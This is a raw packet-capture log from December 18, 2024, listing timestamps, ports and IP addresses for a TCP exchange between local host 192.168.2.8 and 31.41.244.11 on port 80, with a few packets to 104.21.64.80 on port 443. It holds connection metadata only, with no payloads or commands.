Dec 18, 2024 13:38:49.187290907 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.187290907 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.187871933 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.188271999 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.188611031 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.188653946 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.188827038 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.188838959 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.188883066 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.188883066 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.189424992 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.189744949 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.189770937 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.190521955 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.190567017 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.190644979 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.191392899 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.191839933 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.191853046 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.191941023 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.192836046 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.192965984 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.193015099 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.193015099 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.194025040 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.194307089 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.194344997 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.195339918 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.195398092 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.195564985 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.195604086 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.196461916 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.196633101 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.196748972 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.197715044 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.197912931 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.197997093 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.198920012 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.199018955 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.199110985 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.200076103 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.200241089 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.200268984 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.201117039 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.201186895 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.201281071 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.202137947 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.202219009 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.202327967 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.202408075 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.203337908 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.203547955 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.203609943 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.204504013 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.204663038 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.204667091 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.204906940 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.205969095 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.206024885 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.206223965 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.206268072 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.206820011 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.206882000 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.206979036 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.207058907 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.208127975 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.208167076 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.208242893 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.208283901 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.209193945 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.209249020 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.209394932 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.209450006 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.210376978 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.210520029 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.210558891 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.341967106 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.342098951 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.342205048 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.342482090 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.342771053 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.342884064 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.342911005 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.342978001 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.343868971 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.343972921 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.344091892 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.344901085 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.345168114 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.345227003 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.346127987 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.346205950 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.346311092 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.347609997 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.347683907 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.347851038 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.347902060 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.348381996 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.348485947 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.348567009 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.348673105 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.349605083 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.349669933 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.349766016 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.349814892 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.350755930 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.350805044 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.350953102 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.351066113 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.352058887 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.352253914 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.352308989 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.353378057 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.353513002 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.353735924 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.354288101 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.354337931 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.354430914 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.355490923 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.355586052 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.355606079 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.355741024 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.356789112 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.356808901 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.356873989 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.357788086 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.358035088 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.358119011 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.358963013 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.359054089 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.359205008 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.359714031 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.360161066 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.360222101 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.360423088 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.360481024 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.361325026 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.361381054 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.361465931 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.361527920 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.362443924 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.362550974 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.362612009 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.362692118 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.363634109 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.363796949 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.364048004 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.364782095 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.365014076 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.365067959 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.366004944 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.366130114 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.366444111 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.367150068 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.367346048 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.367603064 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.368449926 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.368470907 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.368581057 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.369446039 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.369663954 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.369725943 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.370650053 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.370827913 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.370942116 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.371859074 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.371963024 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.372008085 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.372060061 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.373111010 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.373195887 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.373265982 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.374141932 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.374243975 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.374322891 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.375308990 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.375359058 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.375502110 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.375628948 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.376519918 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.376674891 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.376820087 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.377710104 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.377974033 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.378042936 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.378874063 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.379035950 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.379039049 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.379719019 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.380033016 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.380099058 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.380131006 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.380240917 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.381129026 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.381182909 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.381331921 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.381391048 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.382358074 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.382452965 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.382502079 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.382611036 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.383492947 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.383558035 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.383702993 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.384469986 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.384665966 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.384828091 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.384927988 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.386117935 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.386130095 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.386245966 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.386245966 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.387039900 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.387234926 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.387335062 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.388513088 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.388659000 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.388822079 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.389476061 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.389520884 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.389539003 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.389826059 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.390547991 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.390623093 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.390703917 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.390825987 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.391701937 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.391746998 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.391911983 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.392196894 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.392854929 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.393023014 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.393028975 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.393100977 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.394020081 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.394170046 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.394208908 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.394543886 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.395319939 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.395406961 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.395549059 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.395607948 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.396389008 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.396445036 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.396708012 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.396766901 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.397912025 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.398003101 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.398096085 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.398164988 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.398736954 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.398855925 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.398859024 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.399008989 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.399954081 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.400003910 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.400172949 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.400268078 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.401038885 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.401097059 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.401303053 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.402221918 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.402297020 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.402384043 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.402462006 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.402537107 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.448122025 CET	443	49726	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:49.448251009 CET	49726	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:49.514043093 CET	49726	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:49.514064074 CET	443	49726	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:49.514394045 CET	443	49726	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:49.515732050 CET	49726	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:49.515820980 CET	49726	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:49.515851021 CET	443	49726	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:49.516793013 CET	49726	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:49.516813993 CET	443	49726	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:49.534017086 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.534059048 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.534101009 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.534101009 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.534269094 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.534326077 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.534470081 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.534553051 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.535379887 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.535797119 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.535859108 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.536952972 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.537126064 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.537269115 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.537374020 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.537959099 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.538009882 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.538219929 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.538270950 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.539159060 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.539249897 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.539283991 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.540406942 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.540487051 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.540518045 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.540582895 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.541421890 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.541635990 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.541723967 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.541769028 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.542624950 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.542768955 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.542798996 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.542818069 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.543715954 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.543853998 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.543932915 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.544058084 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.545032024 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.545052052 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.545083046 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.545119047 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.545936108 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.546101093 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.546356916 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.547152996 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.547230005 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.547261000 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.547337055 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.548351049 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.548517942 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.548625946 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.548809052 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.549469948 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.549566031 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.549597979 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.549674988 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.550596952 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.550690889 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.550762892 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.550829887 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.551760912 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.551805019 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.551995039 CET	80	49723	31.41.244.11	192.168.2.8
